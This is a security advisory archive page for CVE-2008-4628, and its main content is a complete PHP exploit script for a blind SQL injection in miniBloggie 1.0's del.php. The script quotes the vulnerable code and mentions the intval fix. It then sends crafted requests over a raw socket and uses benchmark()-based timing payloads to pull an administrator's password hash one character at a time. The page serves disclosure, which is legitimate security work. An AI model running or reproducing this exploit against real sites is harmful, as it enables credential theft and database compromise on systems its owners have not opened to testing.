|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||||
SecurityAlert : 4442 CVE : CVE-2008-4628 CWE : CWE-89 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes
Credit : StAkeR Published : 22.10.2008
Advisory Content : #!/usr/bin/php <?php error_reporting(0); /* miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit ------------------------------------------------------------ Author -> StAkeR aka athos - StAkeR[at]hotmail[dot]it Date -> 18/10/2008 Get -> http://www.mywebland.com/dl.php?id=2 ------------------------------------------------------------ File del.php 25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id']; 26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm']; 27. 28. if ($confirm=="") { 29. notice("Confirmation", "Warning : Do you want to delete this post ? <a href=del.php?post_id=".$post_id."&confirm=yes>Yes</a>"); 30. } 31. elseif ($confirm=="yes") { 32. // Data Base Connection // 33. dbConnect(); 34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id"; 35. $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error()); 36. $confirm =""; 37. notice("Del Post", "Data Deleted"); 38. } 39. else notice( "Delete Error, Unable to complete the task !" ); 40. ?> NOTE: $sql = "DELETE FROM blogdata WHERE post_id=$post_id"; $post_id isn't escaped so you can execute SQL Code How to fix? sanize $post_id with intval or int (PHP Functions) */ function get($host,$path,$evil) { if(!preg_match('/\w:[0-9]/i',$host)) alert(); $inet = explode(':',$host); if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused'); $data .= "GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\r\n"; $data .= "Host: $host[0]\r\n"; $data .= "User-Agent: Lynx (textmode)\r\n"; $data .= "Connection: close\r\n\r\n"; fputs($sock,$data); while(!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; } function alert() { echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n"; echo "# Usage: php {$argv[0]} [host:port] [path] [user_id]\r\n"; echo "# Usage: php {$argv[0]} localhost:80 /minibloggie 1\r\n"; die; } function charme($char,$colum,$id) { $sql = "1 or (select if((ascii(substring(password". ",$colum,1))=$char),benchmark(200000000,char(0)),0)". " from blogusername where id=$id)#"; return urlencode($sql); } $hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); $c = 0; for($i=0;$i<=32;$i++) { for($j=0;$j<=17;$j++) { $start = time(); get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3]))); $stop = time(); if($stop - $start > 12) { $password .= chr($hash[$j]); $c++;; break; } } } if(isset($password)) { echo "# Hash: $password\r\n"; die; } else { echo "# Exploit Failed!\r\n"; } ?> References : http://securityreason.com/expldownload/1/4949/1 (Exploit)  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||||
| Alert | ||
libopie __readrec() off-by-one
This advisory is related to new FreeBSD advisory FreeBSD-SA-10:05.opie. |
||
| Apache |  |
|
» Apache ActiveMQ 5.4.0 |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2010-04-23| Copyright © SecurityReason.com. All Rights Reserved. |